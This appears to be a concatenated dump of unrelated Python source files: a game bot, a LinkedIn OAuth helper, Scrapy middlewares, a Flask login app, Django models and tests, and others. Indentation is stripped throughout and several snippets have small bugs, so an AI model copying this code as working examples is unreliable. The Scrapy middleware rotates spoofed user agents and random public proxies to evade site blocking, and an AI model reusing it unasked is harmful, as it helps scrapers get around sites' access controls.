hlt.control.game.ready("highlander") # Respond with your name
while True:
# logging.info("New turn!")
start_time = time.time()
# logging.info("Updating:")
hlt.control.num_eligible_spaces = 0
hlt.control.game.update_frame()
hlt.control.total_ships = 0
ship_nums = list()
for player in hlt.control.game.players.values():
hlt.control.total_ships += len(player.get_ships())
ship_nums.append(len(player.get_ships()))
geometric_mean_ships = 1.0
for num in ship_nums:
geometric_mean_ships *= num
hlt.control.mean_ships_per_player = geometric_mean_ships ** (1/len(hlt.control.game.players.values()))
logging.info(f"{hlt.control.game.turn_number}\ttotal_ships\t{hlt.control.total_ships}")
logging.info(f"{hlt.control.game.turn_number}\tmean_ships\t{hlt.control.mean_ships_per_player}")
# scale all the constants based on game details
# must be done before current halite is set, for efficiency, so it will actually be based on last turn
config.set_progress_details()
strategies.scale_constants()
for tpos in hlt.control.ship_target_loc.values():
hlt.control.is_target[tpos] = True
hlt.control.current_halite = 0
hlt.control.target_df = pd.DataFrame(hlt.control.all_pos, columns=['x', 'y', ''])
hlt.control.target_df = hlt.control.target_df.set_index(['x', 'y'], drop=True)
# logging.info("Filling in all scores:")
hlt.control.target_df = hlt.control.target_df.apply(tactics.get_target_score, axis=1)
# for (i, score) in hlt.control.target_df.iteritems():
# logging.info(f"\n@{i[0]},{i[1]},{score},raw,{hlt.control.game.turn_number}\n")
# logging.info(f"{hlt.control.target_df.head()}")
myarr = hlt.control.target_df.unstack()
grad = signal.convolve2d(myarr, kernel, boundary='symm', mode='same')
new_df = pd.DataFrame(grad).stack().reindex_like(hlt.control.target_df)
hlt.control.target_df = new_df
# for (i, score) in hlt.control.target_df.iteritems():
# logging.info(f"\n@{i[0]},{i[1]},{score},conv,{hlt.control.game.turn_number}\n")
# logging.info(f"{hlt.control.target_df}")
hlt.control.coms = list() # command queue
hlt.control.ships = hlt.control.game.me.get_ships()
hlt.control.current_ship_locs = list()
hlt.control.ships_at_max = 0
# get all dropoff adjacent positions:
dropoffs = [do.position for do in hlt.control.game.me.get_dropoffs()]
dropoffs.append(hlt.control.game.me.shipyard.position)
hlt.control.my_dropoffs = dropoffs
hlt.control.adj_posis = list()
for pos in hlt.control.my_dropoffs:
for dx in range(-2, 3):
for dy in range(-2, 3):
if abs(dx) + abs(dy) <= 2:
test_pos = hlt.control.game.game_map.normalize(positionals.Position(pos.x + dx, pos.y + dy))
hlt.control.adj_posis.append(test_pos)
hlt.control.close_adj_posis = list()
for pos in hlt.control.my_dropoffs:
for dx in range(-1, 2):
for dy in range(-1, 2):
if abs(dx) + abs(dy) <= 1:
test_pos = hlt.control.game.game_map.normalize(positionals.Position(pos.x + dx, pos.y + dy))
hlt.control.close_adj_posis.append(test_pos)
# logging.info(f"{hlt.control.adj_posis }")
if hlt.control.ships:
ship_tar_df = hlt.control.target_df.copy()
ship_tar_df = ship_tar_df.sort_values(ascending=False)
cutoff = round((
(len(ship_tar_df.index) ** 2) * (
hlt.control.target_percentile_cutoff / len(hlt.control.ships)
)
))
cutoff = max(len(hlt.control.ship_target_loc.values()) + 300, cutoff)
# logging.info(f"{cutoff}")
hlt.control.ship_tar_df = ship_tar_df.head(n=int(cutoff))
# get ships at max
for ship in hlt.control.ships:
if ship.halite_amount >= hlt.control.minimum_halite_to_collect:
hlt.control.ships_at_max += 1
# logging.info("Getting Ship Roles:")
builders = list()
for ship in hlt.control.ships:
if ship.id not in hlt.control.ship_role:
hlt.control.ship_role[ship.id] = "new"
ships.get_role(ship)
if hlt.control.ship_role[ship.id] == "builder":
builders.append(ship)
if len(builders) >= 1:
hlt.control.building_dropoff = True
else:
hlt.control.building_dropoff = False
# logging.info("{}".format(time.time() - start_time))
# spawn if needed, must be done after the ships locs list is populated
hlt.control.spawning = False
if spawner.spawn_check():
# logging.info("Spawning.")
spawner.spawn()
logging.info(f"{hlt.control.game.turn_number}\tspawning\t{hlt.control.spawning}")
# logging.info("Commanding Ships:")
# get commands for each ship
# command the harvesters first, as I care about them more
unseen_shipsZ = list()
unseen_shipsY = list()
unseen_ships0 = list()
unseen_ships1 = list()
unseen_ships2 = list()
unseen_ships3 = list()
unseen_ships4 = list()
for ship in hlt.control.ships:
if ship.position in hlt.control.my_dropoffs:
msg = ships.get_command(ship)
else:
unseen_shipsY.append(ship)
for ship in unseen_shipsY:
if ship.position in hlt.control.close_adj_posis and hlt.control.ship_target_loc[ship.id] not in hlt.control.close_adj_posis:
msg = ships.get_command(ship)
else:
unseen_shipsZ.append(ship)
for ship in unseen_shipsZ:
if ship.position in hlt.control.adj_posis and hlt.control.ship_target_loc[ship.id] not in hlt.control.adj_posis:
msg = ships.get_command(ship)
else:
unseen_ships0.append(ship)
for ship in unseen_ships0:
if hlt.control.ship_role[ship.id] == "builder":
msg = ships.get_command(ship)
else:
unseen_ships1.append(ship)
for ship in unseen_ships1:
if hlt.control.ship_role[ship.id] == "harvester":
msg = ships.get_command(ship)
else:
unseen_ships2.append(ship)
for ship in unseen_ships2:
if ship.position == hlt.control.ship_target_loc[ship.id]:
msg = ships.get_command(ship)
else:
unseen_ships3.append(ship)
for ship in unseen_ships3:
msg = ships.get_command(ship)
# logging.info("{}".format(time.time() - start_time))
logging.info(f"{hlt.control.game.turn_number}\truntime\t{time.time() - start_time}")
# logging.info("Ending Turn.")
# Send your moves back to the game environment, ending this turn.
hlt.control.game.end_turn(hlt.control.coms)
|
999,474 | c3a32200b65844a13a99097645fe7e1dcf3f3fb6 |
import requests
import oauth2 as oauth
import urllib
import urlparse
from webapp import settings
from webapp.settings import LINKEDIN_API_KEY, LINKEDIN_API_SECRET, LINKEDIN_REDIRECT_URI
# LinkedIn OAuth 1.0a endpoint URLs.
request_token_url = 'https://api.linkedin.com/uas/oauth/requestToken'
authorize_url = 'https://api.linkedin.com/uas/oauth/authorize'
access_token_url = 'https://api.linkedin.com/uas/oauth/accessToken'
# Fixed: original read 'https//www.linkedin.com/...' (missing colon), which
# is not a valid URL scheme and would break any request against it.
authenticate_url = 'https://www.linkedin.com/uas/oauth/authenticate'
class LinkedIn(object):
def __init__(self, api_key=None, api_secret=None, redirect_uri=None):
self.api_key = api_key
self.api_secret = api_secret
self.redirect_uri = redirect_uri
def build_url(self, request={}):
# Get a request token. This is a temporary token that is used for
# having the user authorize an access token and to sign the request to obtain
# said access token.
consumer = oauth.Consumer(self.api_key, self.api_secret)
client = oauth.Client(consumer)
resp, content = client.request(request_token_url, "POST", body=urllib.urlencode({'oauth_callback':self.redirect_uri}))
print content
if resp['status'] != '200':
if settings.DEBUG:
raise ApiError("%s: %s" % (resp['status'], resp['content']))
else:
raise ApiError("Error returned from API")
request_token = dict(urlparse.parse_qsl(content))
# Redirect the user to the authentication URL.
url = "%s?oauth_token=%s" % (authorize_url, request_token['oauth_token'])
print "url = %s" % url
return url, request_token
def authorize(self, oauth_verifier=None, request_token=None):
print "authorize... "
consumer = oauth.Consumer(self.api_key, self.api_secret)
token = oauth.Token(request_token['oauth_token'], request_token['oauth_token_secret'])
token.set_verifier(oauth_verifier)
client = oauth.Client(consumer, token)
resp, content = client.request(access_token_url, "POST")
access_token = dict(urlparse.parse_qsl(content))
return access_token
def create_client(self, access_key=None, access_secret=None):
consumer = oauth.Consumer(self.api_key, self.api_secret)
token = oauth.Token(key=access_key, secret=access_secret)
client = oauth.Client(consumer, token)
return client
def refresh_token(self):
# Get a request token
consumer = oauth.Consumer(self.api_key, self.api_secret)
client = oauth.Client(consumer)
resp, content = client.request(request_token_url, "POST", body=urllib.urlencode({'oauth_callback':self.redirect_uri}))
if resp['status'] != '200':
if settings.DEBUG:
raise ApiError("%s: %s" % (resp['status'], resp['content']))
else:
raise ApiError("Error returned from API")
request_token = dict(urlparse.parse_qsl(content))
url = "%s?oauth_token=%s" % (authorize_url, request_token['oauth_token'])
resp, content = client.request(url, "POST")
access_token = dict(urlparse.parse_qsl(content))
return access_token
class LinkedInHelper(object):
def __init__(self, request_token=None):
self.request_token = request_token
@classmethod
def get_authorize_url(self, service=None):
print service
api = LinkedIn(LINKEDIN_API_KEY, LINKEDIN_API_SECRET, LINKEDIN_REDIRECT_URI)
url, self.request_token = api.build_url()
return url
@classmethod
def get_access_token(self, oauth_verifier=None):
print "get linkedin access token"
api = LinkedIn(LINKEDIN_API_KEY, LINKEDIN_API_SECRET, LINKEDIN_REDIRECT_URI)
access_token = api.authorize(oauth_verifier=oauth_verifier, request_token=self.request_token)
oauth_token = access_token['oauth_token']
oauth_token_secret = access_token['oauth_token_secret']
oauth_expires_in = access_token['oauth_expires_in']
return oauth_token, oauth_token_secret, oauth_expires_in
@classmethod
def create_linkedin_client(self, key=None, secret=None):
print "create linkedin client"
api = LinkedIn(LINKEDIN_API_KEY, LINKEDIN_API_SECRET, LINKEDIN_REDIRECT_URI)
print "api ok"
linkedin_client = api.create_client(key, secret)
return linkedin_client
def refresh_access_token(self):
api = LinkedIn(LINKEDIN_API_KEY, LINKEDIN_API_SECRET, LINKEDIN_REDIRECT_URI)
access_token = api.refresh_token()
oauth_token = access_token['oauth_token']
oauth_token_secret = access_token['oauth_token_secret']
oauth_expires_in = access_token['oauth_expires_in']
return oauth_token, oauth_token_secret, oauth_expires_in
class ApiError(Exception):
pass
|
999,475 | a2c57d97e7ea0e0ecfb49bcff63d17d569e16fa4 | # -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
import random
class UserAgentDownloadMiddleware(object):
USER_AGENT = [
'Mozilla/5.0 (Macintosh U Intel Mac OS X 10_6_8 en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (Windows U Windows NT 6.1 en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (Windows NT 10.0 WOW64 rv:38.0) Gecko/20100101 Firefox/38.0',
'Mozilla/5.0 (compatible MSIE 9.0 Windows NT 6.1 Trident/5.0',
'Mozilla/4.0 (compatible MSIE 8.0 Windows NT 6.0 Trident/4.0)',
'Mozilla/4.0 (compatible MSIE 7.0 Windows NT 6.0)',
'Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1)',
'Mozilla/5.0 (Macintosh Intel Mac OS X 10.6 rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1 rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Opera/9.80 (Macintosh Intel Mac OS X 10.6.8 U en) Presto/2.8.131 Version/11.11',
'Opera/9.80 (Windows NT 6.1 U en) Presto/2.8.131 Version/11.11',
'Mozilla/5.0 (Macintosh Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 Maxthon 2.0)',
'Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 TencentTraveler 4.0)',
'Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1)',
'Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 The World)',
'Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 360SE)',
'Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 Avant Browser)',
]
def process_request(self, request, spider):
user_agent = random.choice(self.USER_AGENT)
request.headers['User-Agent'] = user_agent
class IPProxyDownloadMiddleware(object):
PROXY_LIST = ['202.104.113.35:53281', '221.210.120.153:54402', '124.235.135.87:80', '222.171.251.43:40149',
'14.118.135.10:808', '183.3.150.210:41258', '121.33.220.158:808', '61.135.217.7:80',
'58.53.128.83:3128', '124.243.226.18:8888', '61.160.247.63:808', '117.114.149.66:53281',
'180.104.107.46:45700', '60.191.201.38:45461', '27.29.44.177:8118', '118.187.58.34:53281',
'221.224.136.211:35101', '116.192.175.93:41944', '106.12.7.54:8118', '171.38.27.127:8123',
'27.44.218.109:80', '61.135.155.82:443', '124.235.181.175:80', '106.15.42.179:33543',
'219.238.186.188:8118', '219.234.5.128:3128', '119.123.177.32:8888', '58.215.140.6:8080',
'58.52.170.225:808', '123.157.206.135:80', '139.199.38.182:8118']
def process_request(self, request, spider):
if 'proxy' not in request.meta:
proxy_temp = self.get_proxy
request.meta['proxy'] = proxy_temp
def process_response(self, request, response, spider):
if response.status != 200:
return request
return response
@property
def get_proxy(self):
return 'https://' + random.choice(self.PROXY_LIST)
|
999,476 | 3095477cc6a4a0bd7578b147d0fe6b88f786cbcb | import datetime
from typing import Dict, Union
from core.enums import ItemTypes
from core.locale import _
DEFAULT_ITEM_PRICES = {
ItemTypes.CURSOR: 30,
ItemTypes.CPU: 100,
ItemTypes.CPU_STACK: 1000,
ItemTypes.COMPUTER: 10000,
ItemTypes.SERVER_VK: 50000,
ItemTypes.QUANTUM_PC: 200000,
ItemTypes.DATACENTER: 5000000
}
ITEM_STATS = {
ItemTypes.CURSOR: 1,
ItemTypes.CPU: 3,
ItemTypes.CPU_STACK: 10,
ItemTypes.COMPUTER: 30,
ItemTypes.SERVER_VK: 100,
ItemTypes.QUANTUM_PC: 500,
ItemTypes.DATACENTER: 1000
}
ITEMS_AVAILABLE = [
ItemTypes.CURSOR,
ItemTypes.CPU,
ItemTypes.CPU_STACK,
ItemTypes.COMPUTER,
ItemTypes.SERVER_VK,
ItemTypes.QUANTUM_PC,
ItemTypes.DATACENTER
]
class BotWallet(object):
def __init__(self):
self.place = 0
self.score = 0
self.tick = 0
self.items = dict()
self.item_prices = DEFAULT_ITEM_PRICES.copy()
self.hourly_rate = 0
def get_player_score_report(self) -> str:
score = round(int(self.score) / 1000, 3)
speed = round(int(self.tick) / 1000, 2)
return _('Coins: {} | Speed: {} / tick | Place: {}').format(score, speed, self.place)
def get_player_items_report(self) -> str:
return ' | '.join(["{}: {}".format(_(key), value) for (key, value) in self.items.items()])
def get_player_stats_report(self) -> str:
hourly_rate = self.hourly_rate / 1000
return _("Hourly rate: {}").format(hourly_rate)
def set_score(self, score: any) -> None:
self.score = int(score)
self.on_update()
def set_place(self, place: str) -> None:
self.place = place
self.on_update()
def set_tick(self, tick: any) -> None:
self.tick = tick
self.calculate_hourly_rate()
self.on_update()
def update_items(self, items: Dict) -> None:
self.items = {item: 0 for item in ITEMS_AVAILABLE}
for item in items:
if item in ITEMS_AVAILABLE:
self.items[item] = self.items[item] + 1
self.update_item_prices()
self.on_update()
def _calculate_item_price(self, default_price, count) -> int:
if count < 1:
return default_price
return round(1.3 * self._calculate_item_price(default_price, count - 1))
def calculate_item_price(self, item: ItemTypes) -> int:
default_price = DEFAULT_ITEM_PRICES.get(item)
item_count = self.items.get(item, 0)
return self._calculate_item_price(default_price, item_count)
def update_item_prices(self) -> None:
for item in self.item_prices.keys():
self.item_prices[item] = self.calculate_item_price(item)
def has_player_enough_coins_to_buy(self, item: str) -> bool:
self.update_item_prices()
item_price = self.item_prices.get(item, 0)
return self.score > item_price
def calculate_hourly_rate(self) -> None:
self.hourly_rate = self.tick * 3600
def calculate_goal_time(self, goal: int) -> datetime.timedelta:
if goal < self.score / 1000 or (self.tick / 1000) == 0:
seconds = 0
else:
amount = goal - self.score / 1000
seconds = amount // (self.tick / 1000)
return datetime.timedelta(seconds=seconds)
def on_update(self) -> any:
pass
def get_best_item_to_buy(self) -> Union[ItemTypes, None]:
if not self.items or not self.item_prices:
return None
sorted_by_price_items = sorted(self.items, reverse=True, key=lambda i: self.item_prices[i])
best_item = sorted_by_price_items[0]
for item in sorted_by_price_items[1::]:
best_item_price = self.item_prices[best_item]
best_item_efficiency = (self.items[best_item] + 1) * ITEM_STATS[best_item]
item_efficiency = (self.items[item] + 1) * ITEM_STATS[item]
item_price = self.item_prices[item]
diff = best_item_price // item_price
if diff > 1:
efficiency_diff = best_item_efficiency - item_efficiency * diff
if efficiency_diff < 0:
best_item = item
return best_item
|
999,477 | c379b3d86ed26e0d48c8b114257ff0c81e623fc3 | from .ItemReader import read_items
from random import randint
items_collection = {
'boot': read_items('botas'),
'weapon': read_items('armas'),
'helmet': read_items('cascos'),
'glove': read_items('guantes'),
'armor': read_items('pecheras')
}
def items(type):
return items_collection[type]
class ItemGen:
def __init__(self, type, id):
item = items(type)[id]
self._type = type
self._id = id
self._str = item['str']
self._agi = item['agi']
self._dex = item['dex']
self._res = item['res']
self._vit = item['vit']
@property
def str(self):
return self._str
@property
def agi(self):
return self._agi
@property
def dex(self):
return self._dex
@property
def res(self):
return self._res
@property
def vit(self):
return self._vit
@property
def id(self):
return self._id
@property
def type(self):
return self._type
def mutate(self):
r = self.id
while r == self.id:
r = randint(0, len(items(self.type)) - 1)
return ItemGen(self.type, r)
def __repr__(self):
return f'{self.type} [id: {self.id}]'
def __eq__(self, other):
if isinstance(self, other.__class__):
return self._id == other._id and self._type == other._type
return False
def __hash__(self):
return hash((self.type, self.id))
|
999,478 | 340227221b28c86f235553d1391462a788ae8ead | class GroupAddError(Exception):
## raised when the group object gets a non-addable object (non group or engine object) ##
__module__ = Exception.__module__
def __init__(self, inst, class_type):
"""
instance inst - the illegal instance that is added to a group
type class_type - the type of instance inst
"""
self.type = str(class_type)[7:]
self.type = self.type[:-1]
self.inst = inst
return
def __str__(self):
return f"instance '{self.inst}' of class type {self.type} cannot be added to a Group" |
999,479 | 25ecec114df46d534e73c213dd4fd6e3cbf91e5e | from flask import render_template, url_for, flash, redirect, session
from datetime import timedelta
from functools import wraps
from app import app
from passlib.hash import sha256_crypt
import app.forms as forms
import app.dbconnection as db
import app.helpers as hp
@app.before_request
def before_request():
session.permanent = True
app.permanent_session_lifetime = timedelta(minutes=20)
def login_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return f(*args, **kwargs)
else:
flash("By uzyskać dostęp do tej strony musisz być zalogowany.", "danger")
return redirect(url_for('login'))
return wrap
@app.route('/')
def default():
if 'logged_in' in session:
return redirect(url_for('main'))
return redirect('login')
@app.route('/main')
@login_required
def main():
perm = hp.find_rights(session['username'])
return render_template('main.html', perm=perm, title='Strona główna')
@app.route('/plan', methods=['GET', 'POST'])
@login_required
def plan():
perm = hp.find_rights(session['username'])
form = forms.Plan()
form = hp.create_service_view(form)
if form.validate_on_submit():
hp.add_service_to_db(form)
flash(f'Pomyślnie dodano nowe zgłoszenie na dzień {form.date.data}.', 'success')
return redirect('main')
return render_template('plan.html', perm=perm, form=form, title='Zaplanuj')
@app.route('/orders_list')
@login_required
def orders_list():
perm = hp.find_rights(session['username'])
data = hp.create_orders_list_view()
return render_template('orders_list.html', data=data, perm=perm, title='Wykaz zleceń')
@app.route('/supplies_list')
@login_required
def supplies_list():
perm = hp.find_rights(session['username'])
data = hp.create_supplies_list_view()
return render_template('supplies_list.html', data=data, perm=perm, title='Wykaz zaopatrzenia')
@app.route('/login', methods=['GET', 'POST'])
def login():
if 'logged_in' in session:
flash('Jesteś już zalogowany.', 'danger')
return redirect(url_for('main'))
else:
form = forms.Login()
if form.validate_on_submit():
login = form.login.data
password = str(form.password.data)
if hp.check_if_login_exists(login):
rights = db.find_parameter('konta', 'uprawnienia', 'login', login)
if rights is not 0:
userPassword = db.find_parameter('konta', 'haslo', 'login', login)
if sha256_crypt.verify(password, userPassword):
session['logged_in'] = True
session['username'] = login
flash(f'Cześć {login}!', 'success')
return redirect(url_for('main'))
else:
flash('Aby móc się zalogować musisz posiadać aktywne konto!', 'danger')
return redirect(url_for('login'))
flash('Błędny login lub hasło. Spróbuj ponownie.', 'danger')
return render_template('login.html', form=form, title='Zaloguj')
@app.route('/logout')
@login_required
def logout():
username = session['username']
session.clear()
flash(f"Do zobaczenia {username}!", "success")
return redirect(url_for('login'))
@app.route('/register', methods=['GET', 'POST'])
def register():
form = forms.Register()
if form.validate_on_submit():
login = form.login.data
if not hp.check_if_login_exists(login):
password = sha256_crypt.hash(str(form.password.data))
values = [login, password, form.name.data, form.surname.data]
db.insert_account(values)
flash(f'Pomyślnie stworzono konto. Będzie ono aktywne po akceptacji administratora.', 'success')
return redirect(url_for('login'))
else:
flash('Konto o podanym loginie już istnieje.', 'danger')
return render_template('register.html', form=form, title='Stwórz konto')
|
999,480 | a460604f4060d6372824508786781e9878d8173b | import os
from django.db import models
from project import settings
PART_DATA_FILE = 'static/csv/upload/pdata.csv'
PART_FAIL_FILE = 'static/csv/upload/pfail.csv'
class PartDataFile(models.Model):
class Meta:
db_table = 'part_data_file'
def content_file_name(instance, filename):
return PART_DATA_FILE
file = models.FileField(upload_to=content_file_name)
uploaded = models.DateTimeField(auto_now_add=True)
def save(self, *args, **kwargs):
print("[Debug] Upload part data file begin")
upload_path = os.path.join(settings.BASE_DIR, PART_DATA_FILE)
if os.path.isfile(upload_path):
os.remove(upload_path)
super(PartDataFile, self).save(*args, **kwargs)
print("[Debug] Save part data file completed")
class PartFailFile(models.Model):
class Meta:
db_table = 'part_fail_file'
def content_file_name(instance, filename):
return PART_FAIL_FILE
file = models.FileField(upload_to=content_file_name)
uploaded = models.DateTimeField(auto_now_add=True)
def save(self, *args, **kwargs):
print("[Debug] Upload part fail file begin")
upload_path = os.path.join(settings.BASE_DIR, PART_FAIL_FILE)
if os.path.isfile(upload_path):
os.remove(upload_path)
super(PartFailFile, self).save(*args, **kwargs)
print("[Debug] Save part fail file completed")
|
999,481 | a47b385484aec906f63eb84f71d47c9e803fbb73 | import time
from selenium import webdriver
import unittest
from opensource_demo_orangehrmlive.POMProject.Pages.loginPage import LoginPage
from opensource_demo_orangehrmlive.POMProject.Pages.homePage import HomePage
import HtmlTestRunner
class LoinTest(unittest.TestCase):
@classmethod
def setUp(Self):
Self.driver = webdriver.Chrome()
Self.driver.implicitly_wait(5)
Self.driver.maximize_window()
def test_01_login_valid(self):
driver = self.driver
driver.get("https://opensource-demo.orangehrmlive.com/")
login = LoginPage(driver)
login.enter_username("Admin")
login.enter_password("admin123")
login.click_login()
homepage = HomePage(driver)
time.sleep(2)
homepage.click_welcome()
homepage.click_logout()
def test_02_login_invalid_username(self):
driver = self.driver
driver.get("https://opensource-demo.orangehrmlive.com/")
login = LoginPage(driver)
login.enter_username("Admin1")
login.enter_password("admin123")
login.click_login()
message = driver.find_element_by_xpath("//span[@id='spanMessage']").text
self.assertEqual(message, "Invalid credentials")
@classmethod
def tearDown(self):
self.driver.quit()
print("Test completed")
if __name__ == '__main__':
unittest.main(testRunner=HtmlTestRunner.HTMLTestRunner(output="D:/Other/python/reports"))
|
999,482 | 5cb35cc33b7635e28ad578e7ef0fbc674e53996f | #!/usr/python env
# class to represent node in bst
class Node(object):
    """A single node of a binary search tree.

    A freshly built node is detached: all of its links start as None and are
    wired up later by the tree's insert logic.
    """

    def __init__(self, value):
        # Payload stored at this node.
        self.value = value
        # Tree links: parent plus left/right children.
        self.parent = None
        self.left = None
        self.right = None
999,483 | 9d153197f8b1d9572251835949ccdf51e2f89d42 | from django import forms
from core.orders.models import Order
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout, Submit, Row, Column
class OrderCreateForm(forms.ModelForm):\
class Meta:
model = Order
fields = ['first_name', 'last_name', 'email', 'address', 'postal_code', 'city']
def __init__(self, *args, **kwargs):
super(OrderCreateForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(
Row(
Column('first_name', css_class='form-group col-md-6 mb-0'),
Column('last_name', css_class='form-group col-md-6 mb-0'),
css_class='form-row'
),
'email',
Row(
Column('address', css_class='form-group col-md-6 mb-0'),
Column('city', css_class='form-group col-md-4 mb-0'),
Column('postal_code', css_class='form-group col-md-2 mb-0'),
css_class='form-row'
),
Submit('submit', 'Оплатить')
)
|
999,484 | 4f3a97fc2291d4986624c7bbbfb992833bff93bf | from .dribble_ball import *
from .action import *
from .helper_functions import *
from .move_to import *
from .Goalie import *
from .robot import *
|
999,485 | e23935673d77c642c60039106f4844b3d5e6737a | #!/usr/bin/python
from multiprocessing import Process, Pool, Queue
import time
import random
def f(x):
print x*x
time.sleep(random.randint(1, 10))
return x
if __name__ == '__main__':
pool = Pool(processes=4)
result = pool.map(f, range(100))
print result |
999,486 | 5902dc7eb145b4bb8319a9734458dcb40d868751 | class Solution:
def majorityElement(self, nums: List[int]) -> int:
# 开心消消乐,不一样的两个数相互抵消掉,剩下最后一个(或n)个数就是众数
stack = []
for item in nums:
if len(stack) == 0:
stack.append(item)
else:
if stack[-1] != item:
stack.pop()
else:
stack.append(item)
return stack[-1] |
999,487 | 79cfd875d3bd84e481411276f93393bc70a6be75 | #!C:\Users\Lenovo\Desktop\Online_Angular_8_Batch\My-Neighborhood-master\venv\Scripts\python.exe
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
999,488 | eb12e8b89799359afa2812019cf7dba8ea343060 | import pandas as pd
import requests
# ______________________________________________________________________________
def update_store_data(df):
'''This function takes the complete_data for stores
changes the date to be datetime
sets indesx to be date
create a month, day of the week, and sales total features
reutrns df'''
# change the date
df.sale_date = pd.to_datetime(df.sale_date)
# set the index
df = df.set_index('sale_date').sort_index()
# create new features
df['month'] = df.index.month
df['day_of_week'] = df.index.day_name()
df['sales_total'] = df.sale_amount * df.item_price
#return the new df
return df
def update_german_energy(df):
'''takes in the german energy data frame
changes date format
sets date as index
renames wind+solar
adds month and year features
replace null values'''
# change date format
df.Date = pd.to_datetime(df.Date)
# set index
df = df.set_index('Date').sort_index()
# add month and yar columns
df['month'] = df.index.month
df['year'] = df.index.year
# replace nulls with 0
df.Wind[np.isnan(df.Wind)] = 0
df.Solar[np.isnan(df.Solar)] = 0
df.Wind_and_Solar[np.isnan(df.Wind_and_Solar)] = 0
# df['month'] = df.index.month
df['year'] = df.index.year
# return df
return df |
999,489 | 50249a02957041431378634eddf4e39fbaa30963 | import pygame
Ga1 = input("Herzlich WIllkommen zum Test der Idioten.[ENTER]")
Ga2 = input("Normalerweise müsste jeder den Test ohne Fehler hinbekommen.[ENTER]")
Ga3 = input("Du musst immer mit nur einem Wort antworten![ENTER]")
Ga4 = input("Bist du Bereit?[ENTER]")
aa1 = input("Fangen wir mit der ersten Frage an.[ENTER]")
print("1. BIst du ein 1% schlau oder 1% dumm?")
print("Hier musst du mit 1% schlau oder 1% dumm antworten")
antwort = input("Eingabe: ")
if antwort =="1% schlau":
print("Die Antwort ist Falsch, weil wenn du 1% schlau bist, bist du du 99% dumm!")
quit()
elif antwort =="1% dumm":
print("Die Antwort ist Richtig, weil wenn man 1% dumm ist, ist man 99%schlau!")
|
999,490 | d1ced553c62414d3729e105890e09a4f48e50450 | /Users/duran/anaconda/lib/python2.7/stat.py |
999,491 | 630c326b10cb10c8e8e275a86e1366db52a89802 | '''
Project Euler #7
Find the 10001st Prime
'''
from primes import prime_list
primes = prime_list(500000)
prime_count = 1
x = 2
while x < 100001:
x += 1
if primes[x]:
prime_count += 1
print x
|
999,492 | e0fdb08fdb996730f5a5de467080ba4dd754e1f0 | #Author :afeng
#Time :2018/5/27 17:11
import requests
url="http://fanyi.baidu.com/basetrans"
data={"query":"你好,世界","from":"zh","to":"en"}
headers={"User-Agent":"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36"}
response=requests.post(url,data=data,headers=headers)
print(response.content.decode()) |
999,493 | 7b130d02867d7d722083faf6d74c792f3f1ebea3 | from django.test import TestCase
from .models import Category, Origin, Location, Product
# Create your tests here.
class TestModels(TestCase):
    """Model tests for Category, Origin, Location and Product.

    Verifies field verbose names, ``max_length`` limits, ``__str__``
    output, and that ``Product.price`` is not stored as a string, using
    one fixture row per model created once in :meth:`setUpTestData`.
    """

    @classmethod
    def setUpTestData(cls):
        # One row per model, shared (and never modified) by all tests;
        # the tests below rely on these being pk=1.
        Category.objects.create(name='Test Category', friendly_name='Test friendly name')
        Origin.objects.create(name='Test Origin', friendly_name='Test Origin friendly name')
        Location.objects.create(name='Test Location', friendly_name='Test Location friendly name')
        Product.objects.create(description='My product', friendly_name='product', price=100, brand='some')

    # --- Category ---------------------------------------------------------

    def test_category_name_label(self):
        name = Category.objects.get(pk=1)
        field_label = name._meta.get_field('name').verbose_name
        self.assertEqual(field_label, 'name')

    def test_category_friendly_name_label(self):
        name = Category.objects.get(pk=1)
        field_label = name._meta.get_field('friendly_name').verbose_name
        self.assertEqual(field_label, 'friendly name')

    def test_category_name_max_length(self):
        name = Category.objects.get(pk=1)
        max_length = name._meta.get_field('name').max_length
        self.assertEqual(max_length, 254)

    def test_category_friendly_name_max_length(self):
        friendly_name = Category.objects.get(pk=1)
        max_length = friendly_name._meta.get_field('friendly_name').max_length
        self.assertEqual(max_length, 254)

    def test_category_string_method(self):
        # Category.__str__ is expected to return the name field.
        item = Category.objects.get(pk=1)
        expected_object_name = f'{item.name}'
        self.assertEqual(expected_object_name, str(item))

    # --- Origin -----------------------------------------------------------

    def test_origin_name_label(self):
        name = Origin.objects.get(pk=1)
        field_label = name._meta.get_field('name').verbose_name
        self.assertEqual(field_label, 'name')

    def test_origin_friendly_name_label(self):
        name = Origin.objects.get(pk=1)
        field_label = name._meta.get_field('friendly_name').verbose_name
        self.assertEqual(field_label, 'friendly name')

    def test_origin_name_max_length(self):
        name = Origin.objects.get(pk=1)
        max_length = name._meta.get_field('name').max_length
        self.assertEqual(max_length, 254)

    def test_origin_friendly_name_max_length(self):
        friendly_name = Origin.objects.get(pk=1)
        max_length = friendly_name._meta.get_field('friendly_name').max_length
        self.assertEqual(max_length, 254)

    def test_origin_string_method(self):
        item = Origin.objects.get(pk=1)
        expected_object_name = f'{item.name}'
        self.assertEqual(expected_object_name, str(item))

    # --- Location ---------------------------------------------------------

    def test_location_name_label(self):
        name = Location.objects.get(pk=1)
        field_label = name._meta.get_field('name').verbose_name
